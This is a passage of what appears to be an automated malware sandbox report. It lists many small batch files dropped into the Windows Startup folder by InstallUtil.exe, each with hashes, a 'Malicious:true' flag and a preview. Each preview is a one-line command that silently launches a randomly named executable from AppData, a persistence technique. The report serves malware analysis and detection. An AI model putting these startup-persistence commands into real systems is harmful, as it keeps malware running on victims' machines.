                                                                                                                                                                                                                                SHA-512:C43AD55A41FB56D8FD82AE82498F6687E9B8592BE8B732AB3C29DF9283E5260852E6D8A86E95BF3068311BF838BC743CB18E6AE6EDE3B5BF19E853C144A5C692
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\pxXbxOFPbFSHTNbciHYCsLtx.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CTuYRPLN8CgT4PB5QSqLONlo.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526514
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DWnzS/3oqQXPLJFn:fE1wkn23z/3oqQXPn
                                                                                                                                                                                                                                MD5:C2FF8DB89D340944B05E5548545BFBBA
                                                                                                                                                                                                                                SHA1:D6964E8143E70904B836602E33E719C6DE05DCA7
                                                                                                                                                                                                                                SHA-256:A391B93A90EFF36B0F7C040A435C4A45BF7FEE4EE25A822004A5416C69B18111
                                                                                                                                                                                                                                SHA-512:20293AA6F597B59700D7BBBBF3D0EE850C4664F4124F9B8FDAF5476EA1F4B9A898E560C32EFE566833607BE47C420D4537BA8998597FFEC46DA331898AA339DA
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\f3jz5WVmWaBPPPREHO52FM3n.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CizbWvvGUnk05BM6mZJPptaz.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.926150414379995
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5xwCBE/2ch0RFCln:fE1wkn23lBEjeFs
                                                                                                                                                                                                                                MD5:0661ACFD7BE23B40EB390996C9CEDFE8
                                                                                                                                                                                                                                SHA1:CD99F459D67FEC9AA98E658587DCEA0242FCF4B9
                                                                                                                                                                                                                                SHA-256:EB6A54D83E4143829F528E7B1EA0698D9ED6146705A2AAA3D73CD43893AEE72A
                                                                                                                                                                                                                                SHA-512:37CC7E4DBD82CD7550C128313190F126C8837B320A0DF614C774340FA9057C833E2359747F9B8D42397AD45C885925DAF138BDD7DA1B78802DB656719DD7B5E7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\TUgcsAhZj9KS9L7Y6WBtONe5.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D2m62fF9GqYbEVP6vD9j2gxn.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.905716942869603
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5TfQCGL8VIxZl:fE1wkn238Cc86vl
                                                                                                                                                                                                                                MD5:E5CE2E7EABB36FE0B72459B0695BAE3E
                                                                                                                                                                                                                                SHA1:FD2B98958CCB9DE5ED3C75D7E5449A5BD3D372B6
                                                                                                                                                                                                                                SHA-256:8073ECAE41069062983F947D32AE4B12D943C77D5B3C20123A56460CB407DE6B
                                                                                                                                                                                                                                SHA-512:972B6543E6E3FEE8B631DEBAB1E229008D699A43F46B07E15E2B87250611393AF6DE6AB1D83A937D0505411AF2DC2A509C4EC3D90C6073284E3CC2C7B90E7CC2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\6ZqpY056kcnYDSL39QayoHTr.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DPJLpwNaMsKVDJVgWZDaOfvk.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.926150414379995
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5/CVsTdmldiF:fE1wkn23qVsT2EF
                                                                                                                                                                                                                                MD5:86D3FF075FC960E1554A6B7CF905DAA1
                                                                                                                                                                                                                                SHA1:0F756EEE65D0ED4A28B3DD371096B7FC7FE8874F
                                                                                                                                                                                                                                SHA-256:02EC46F9BCF49801AD6445DCD17820D75ED19B429EB947100E7080902F1AD8F5
                                                                                                                                                                                                                                SHA-512:8191FC9BD5CB5E15CB0D45FCDE62437DF0B5BDA3CF0BE899508F57C722F4A6BDEE8E0CF8076750695586A886BFB6D4A686BC89A4B42359F35D64B1978B7FF7A3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ZNUkdRLikcOE0I8txHta42nK.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dqz7fQjdgpBOVOEwVuzrvS7L.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526515
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5E3rNJXdQf0CHFn:fE1wkn23EbNJtQf0CHF
                                                                                                                                                                                                                                MD5:FB5EF48EB84DDB420355A97D161C1557
                                                                                                                                                                                                                                SHA1:484B5D031A10AE375E1345F684D8674AEC5FE991
                                                                                                                                                                                                                                SHA-256:C2C7D7102B962E37866E9E3910C8DB944ED980D1E6248FB8E1DEEDC78400152E
                                                                                                                                                                                                                                SHA-512:46AFF9148C7B0C7F41F2471D37AD73F4A0099C8C24239CF9FEBA26533C7A61AE5F0E5C81D7ED62A520B4053BB3247CE38B2D71D516886364A2AAA18D8B8808B7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\aRNQGQYPdgEPyk2wKE0Y2RBY.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EFETrEauohMUCVpzszudURYY.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.818760421130472
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J58vvHLiv:fE1wkn238HH+v
                                                                                                                                                                                                                                MD5:C54ED1F21B3008ADB614F1A601B786EF
                                                                                                                                                                                                                                SHA1:28F83FFA703195B1CB2826C9BA7E58EF3A888129
                                                                                                                                                                                                                                SHA-256:A009575E441443446E1F5043F2D2F5C354EA54AD969145B3C202A7C7AE4B4917
                                                                                                                                                                                                                                SHA-512:44E90E74666FF4B5E9034487925A6A61D280898B15684AC1B3D7EAE05D9BB756B8DD2B76B7AA806371B053BBCB563932A9C727DCD036547FD393CD8196DE1DE8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Ydv77irsMwFsUh797bOnhxVa.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EzK2ceYSUfPRcBaU9TkNfaTf.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.945642848698058
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5r9Ejec3l3:fE1wkn23ZKD3V
                                                                                                                                                                                                                                MD5:B2FEDA86E17E41D574D6B8E6493B4D63
                                                                                                                                                                                                                                SHA1:70B8EE450CCCCF905A3EFBEA420354F9EC4C994D
                                                                                                                                                                                                                                SHA-256:3F43AFE80431F0A7F6E14223B145A9F962E51D2EF16756631283524DE7EF48C8
                                                                                                                                                                                                                                SHA-512:D17518786AC8D98712179D5C6C8EEBCA38F4C7F8157E8C7A0A7F73CBD9D97868A4B69A33452D817E6BE665E92E99008D1F1A19B7A2901B1C46390A2F31C70B15
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NZM2kE4xFO5iDsk9Rikx4C6y.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F2SoYI0VgAOawpvWVdJVVDIM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.820207746784238
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5soicg79BCHFn:fE1wkn23sT3BCl
                                                                                                                                                                                                                                MD5:1327DE24D0F734A926B61F60FD164A87
                                                                                                                                                                                                                                SHA1:6DA071A7549C2717F775113C5D8F146952EAB743
                                                                                                                                                                                                                                SHA-256:4DF36D78CE7DB25F513CD596375A1CA80EB9E4FFB16CAE57A47494AA365AD056
                                                                                                                                                                                                                                SHA-512:622ADD23F1F46DFD36C9CD71C8FDAEC17B193DDFB4919CE251B80803FD603DF4E3A74A1F6DB3E1260B02E47982DBBB6E06D8D03E4B16E06CF0007C8D156B6686
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\I6q6xa8OpNqFa1GE2NL68OxV.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ff4HfnvNq5FdWodG1vRYL2NM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.871448421469599
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5fMKdZmMGWIkm:fE1wkn230Kd8H8m
                                                                                                                                                                                                                                MD5:2A64110A3AD0E947E6962632F421791D
                                                                                                                                                                                                                                SHA1:DDA77A4F955C2AA13A9E4DEDF9D7185F08B096D3
                                                                                                                                                                                                                                SHA-256:8633AF777CF4BB3DF622A676B153766175B076C5B4AECF29C4ED1EC773ABF9CF
                                                                                                                                                                                                                                SHA-512:24B5672917272F2524A7540AB4F738C7F0467E74C39C73F82247C97DD9538B1848BA1DD9F1D9D022B2BBDF7CF6E7A37DC9D587CECA9A188F7642A325D72C1ED8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\zpUboT49MR3eAuGylrU8kcsm.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\G8ldCvYSMjZMx5lkoyQ6Gvn2.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.929045065687527
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5SGoKHLLKG:fE1wkn23SGokP3
                                                                                                                                                                                                                                MD5:ADFEF4C4069AE42473AE7A175FD23369
                                                                                                                                                                                                                                SHA1:DEC7BFAC94DE4322D1AE76EB34D2027A5FA5F5B4
                                                                                                                                                                                                                                SHA-256:1B6A7EF26F0C1BDB4AD76D2DAFAF3E0D65C7261ECC1854EB7B07C764673CF8C5
                                                                                                                                                                                                                                SHA-512:5FA18D7D1CCBE09D5F8CFDFF360BDC289BBAFE44C4B4F8F45C71ADE1ADB0F75AABB416C438AE2CEC14DE37A06C71D633A081436098182654F3C1DAEEDB297968
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\7cpaa9oydWlSDG3uNiB45oQF.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GPBZ3pTErTY3e9leZcqdjvav.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.909552631369464
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5UbJb6TVYVLNHFn:fE1wkn23UbN6OVLNHF
                                                                                                                                                                                                                                MD5:D19440F69B93549585F43D7F91ABDA0B
                                                                                                                                                                                                                                SHA1:D055E21A4C61BE3E5B2FBC913C5E2D97735B643A
                                                                                                                                                                                                                                SHA-256:D416BE95BEE9AD2CA366C342F2F5E06A263E4BE12563115C43C5E1489D01B23A
                                                                                                                                                                                                                                SHA-512:9C0B01DFE439F701186BBBCF22572517B43D654172525DFB250B8189B00C18C30420F093E044700AD01AC00E872E4206B5A7D5188B6E313FFC6D03C70C1FBF95
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\qfp0lXmf35DYe7EpAYkTc2V7.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H6C8H8atjKBB32y6kz0KwOYz.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.944195523044292
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5SpWtxXrm:fE1wkn23SpoQ
                                                                                                                                                                                                                                MD5:2C10A6A9CD59A2111A3533FFD767D4DA
                                                                                                                                                                                                                                SHA1:98ADB6C288126758B5D12E742ABC8499A141EC09
                                                                                                                                                                                                                                SHA-256:9A07773DED130AC813081BA0319670AD47C9BDA2F46E81651498321C49204D7E
                                                                                                                                                                                                                                SHA-512:ABEE6A72F231FDA5F17D909064C67D095D3BD847117D6161A448E5BBE98849C252FFB1C0E42FC9F7413A112201D4093B9C0189EAE8706D71AFAE96314B3C22B1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\7Ze1sBHT2zACLNmQRZlcE3Tf.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HEiHPMqfTU2BUzEni0ygFieY.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.978838414719121
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J51Qq2pUiF:fE1wkn23hW
                                                                                                                                                                                                                                MD5:D58F9F23402F60166F2B01399F04A333
                                                                                                                                                                                                                                SHA1:B6CDECBB554A904B0F6CBB454B2A10A85A816BE0
                                                                                                                                                                                                                                SHA-256:7B550F598E0718A6B8747C46E223F5292CA276D334FAA3F7746F110F5E65B65E
                                                                                                                                                                                                                                SHA-512:6548517D2AF09D8FC7FBAD3C2878EDBB8BE98B493C4C9FCD8FF387F4EBE7EFD03629621FCE076542AF7B8362EA27E3F1BD78CCCE68423F501474FE80E516A51E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\PuOhjWfV8sy4waUuI70BLeKF.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HLY28VSs4EqLmIyqaUOTirim.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.982425635974515
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5vQwVcm4xSkdan:fE1wkn23Ywim4kD
                                                                                                                                                                                                                                MD5:ED5ECDBA321A551EE5A29665BB363443
                                                                                                                                                                                                                                SHA1:F986E0DC154DC50AAF53B2F037BB8BB285E52F5D
                                                                                                                                                                                                                                SHA-256:E0DBA223AD64430D4F67CD3CE9B583D1CBDAD1ACCEA9EBAA7B34CAE9FBF18F6D
                                                                                                                                                                                                                                SHA-512:826FBA1A91CB3AC36C5C4F9F242CA0D06ED14AD6795933762D0E285EEF04181881E5D9E5439C96E2DB8721B909578FFD71EF1AF0FDFC0EEDDDFC16169BE1DF14
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\JqI9qtwrsBIQ597pcbH2GGod.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HkWShiPP36Gpv4T24kJCvlou.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.0402397306175155
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5SPUQzse2diykdan:fE1wkn23SQe6/D
                                                                                                                                                                                                                                MD5:BFFF005D4ABF1440B77BEEE1E1FB69CE
                                                                                                                                                                                                                                SHA1:6256B56CB6D6ED7CECF3AE2565F9FD5131A8C37E
                                                                                                                                                                                                                                SHA-256:D6C84097EB3003F959A7073AC63330E48A9E73F620115D999620D1095D0C07F6
                                                                                                                                                                                                                                SHA-512:EF1BE587E2E18539D6E7F68EB6235AA31BB44A1F25C8F503D3B8E676C0E83180EA5A4FE914E590B833A185AF8438256CB40A1694CA0B4199DC26CC78D6E55C1D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\7j7a6Y5ZdE9mwtxTh84g5rxP.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I3tGceZE6Qqz7aE3jOU5x1I6.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.858686326958928
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DTkqQvn:fE1wkn23Pkb
                                                                                                                                                                                                                                MD5:85148ADBD389BB05F8E32C9198FEF5C1
                                                                                                                                                                                                                                SHA1:8C58DC6A56086128583367A7C412FF57DB45EDB0
                                                                                                                                                                                                                                SHA-256:15C48021F5A8F5F7D76783CAF03EA606060A369809BB788CAC32E30A7B37BB55
                                                                                                                                                                                                                                SHA-512:DC7F51EA35E794F7A9EB28E54760B76015CC854D94F28C84ED170A4229B20ACB73390626BC5A499694C6BACEF1403018F672F5C373896318B58358096A4C1F26
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\f6TPmOqJ9OCeCveaR02i6cCx.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ii1KL5uilzCRnH7PuS8IaglH.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.904269617215838
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J52ScSADVwR5Nln:fE1wkn232SjADCR5Nl
                                                                                                                                                                                                                                MD5:C991F52C9B3A8927F0F42F51B79DAF8A
                                                                                                                                                                                                                                SHA1:F5389DF9BE3311344524AB4633D6D3653A138EA9
                                                                                                                                                                                                                                SHA-256:4E4E2066BC5BACE37220951548E82ED7F772E00B32AD16CC1E1EB9E898C4DD28
                                                                                                                                                                                                                                SHA-512:A13FDC976275700771AD189FADCAA230C09CA1131543B5D2F75C630576AB4A7A7CB2FD994C5A46D0FD0FA3A59FDB1B80CD39305EC0E74CCF7AB80C8FCB10FBA6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\SwLW7tCu3MPLSebktZR0Do4H.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Iuq59gPB0g4RDHfNUajlbFgV.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.824417805558924
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Hic+HkfL4AHF:fE1wkn23CBYL4iF
                                                                                                                                                                                                                                MD5:2A2B8C46D0BEEEF53073577F7757C131
                                                                                                                                                                                                                                SHA1:FDF7CF43A87B94588DD40C4C9375C77D34289FC8
                                                                                                                                                                                                                                SHA-256:04CE8CDA215BB2D08D3BEF2F11B1F31AA0A50509C5F53DED7A2734B04429E38D
                                                                                                                                                                                                                                SHA-512:B8258212FC41EC6E9BFE81198D21EFD263D9B93DD10BECACEF64C08185F5A9FC747250AE0846892732C5FF32438385710E5AB887E49E03969D1F92364B5A8253
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\bl0crpfxei2USVRb4JVAGKoa.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IzmNdVOYIlxME3DLm9p1Wo8d.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.900059558441151
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5CdTDWkpK:fE1wkn23Cd0
                                                                                                                                                                                                                                MD5:F585AC951F538B0498860CECDC4D1C1F
                                                                                                                                                                                                                                SHA1:3E61BF0B7006A4A88D0426E824CD486A16C52F7B
                                                                                                                                                                                                                                SHA-256:451B2146104C080B6B6EB1BE31F7D8248AC2108F1C16F387679774367A1457A4
                                                                                                                                                                                                                                SHA-512:789F1BC9A645535FAE7A583E74E9EDCA491AD12D37A79BE1FB784ADBC0B7CCCCBED820C3430B85B7A486B78B2A6F080AFCF7D6D04329CF0578267EC98402B864
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\gxzwlUCvc5fJHx9HWi3ALHoN.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J3V1pdpFAtBTREkflB9t911H.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.926150414379996
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5R02utQcaEF:fE1wkn23Fu2caEF
                                                                                                                                                                                                                                MD5:1A7B9B65CC960C80538CA76E00043B71
                                                                                                                                                                                                                                SHA1:A7AC118BCAA026E271E1C11E4110C8AD1327192E
                                                                                                                                                                                                                                SHA-256:8A24816CBA722FC8A9D27024B49E97C3735DA22172A808EABCB9E9C29E982105
                                                                                                                                                                                                                                SHA-512:DCE4BA7A438A538EF4067394BED4E14053299EECBE09196000F62F4F4F23A7018155070D9BDFF2B478F481A67FD9EE3B98823C2E8DBB0568BF6F59A61FF276DB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tQS97uWWtHJ2H92y7dke3VAE.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JFT0ZMX7h2Vok8FUmP23B4xM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.868179399887242
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5OCTRwMFMJ1F:fE1wkn23OQR/+P
                                                                                                                                                                                                                                MD5:384806EC4C355A8AEFF7410C4F117324
